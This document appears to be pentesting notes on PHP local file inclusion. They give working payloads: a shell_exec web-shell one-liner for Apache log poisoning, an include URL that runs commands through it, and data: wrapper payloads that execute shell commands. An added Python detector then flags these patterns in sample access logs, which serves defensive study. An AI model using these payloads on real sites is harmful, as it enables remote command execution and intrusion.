Local File Inclusion

  • Search for URLs with a parameter that includes files, like file=config.php.
  • Try to access different files, like etc/passwd.
  • Based on the operating system, see if we can access log files.
  • Perform log file poisoning.
nc targetdomain targetport

Log File Poisoning

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
  • Then access the log file
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Remote File Inclusion

  • Instead of accessing a local file, access remote files on our server.
  • This type of attack is rarely possible.

PHP wrappers

  • If we are not able to inject code into the access log, we can try the following in the directory traversal:
http://10.11.0.22/menu.php?file=data:text/plain,hello world
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
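
Added example, not part of the original notes: a detection pass over Apache-style access log lines for the request patterns described above (traversal or absolute paths in the include parameter, log files as include targets, wrapper or remote URLs, and PHP tags written into the log itself). The log lines are constructed, and the rule names and the `file` parameter default are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access log lines (not taken from a real system).
SAMPLE_LOG = [
    '10.11.0.4 - - [12/Mar/2024:10:00:01 +0000] "GET /menu.php?file=current_menu.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.11.0.4 - - [12/Mar/2024:10:00:09 +0000] "GET /menu.php?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1301 "-" "Mozilla/5.0"',
    '10.11.0.4 - - [12/Mar/2024:10:01:07 +0000] "<?php /* placeholder */ ?>" 400 226 "-" "-"',
    '10.11.0.4 - - [12/Mar/2024:10:01:30 +0000] "GET /menu.php?file=c:%5Cxampp%5Capache%5Clogs%5Caccess.log&cmd=ipconfig HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.11.0.4 - - [12/Mar/2024:10:02:02 +0000] "GET /menu.php?file=data:text/plain,hello%20world HTTP/1.1" 200 11 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
PHP_TAG_RE = re.compile(r'<\?(?:php|=)', re.I)

# Rules applied to the URL-decoded value of an include parameter (names are assumptions).
PARAM_RULES = {
    "wrapper-or-remote-url": re.compile(r'^(?:data|php|expect|zip|phar|https?|ftp):', re.I),
    "path-traversal": re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)'),
    "absolute-path": re.compile(r'^(?:/|[a-zA-Z]:[\\/])'),
    "log-file-target": re.compile(r'(?:access|error)[._]log', re.I),
}

def classify(line, include_params=("file",)):
    """Return the sorted rule names that one access-log line triggers."""
    hits = set()
    # A PHP open tag anywhere in a log entry means code was written into the log.
    if PHP_TAG_RE.search(line):
        hits.add("php-tag-in-log")
    m = REQUEST_RE.search(line)
    if m:
        # parse_qsl percent-decodes, so ..%2f and %5C are seen as ../ and \
        for name, value in parse_qsl(urlsplit(m.group("target")).query):
            if name in include_params:
                hits.update(r for r, rx in PARAM_RULES.items() if rx.search(value))
    return sorted(hits)

def scan(lines, include_params=("file",)):
    """Return {line_number: [rules]} for lines that trigger at least one rule."""
    results = ((n, classify(l, include_params)) for n, l in enumerate(lines, 1))
    return {n: rules for n, rules in results if rules}

if __name__ == "__main__":
    for number, rules in scan(SAMPLE_LOG).items():
        print(number, ", ".join(rules))
```

Pass the application's real include parameter names in `include_params`; values are decoded once, so double-encoded input needs an extra decoding pass before matching.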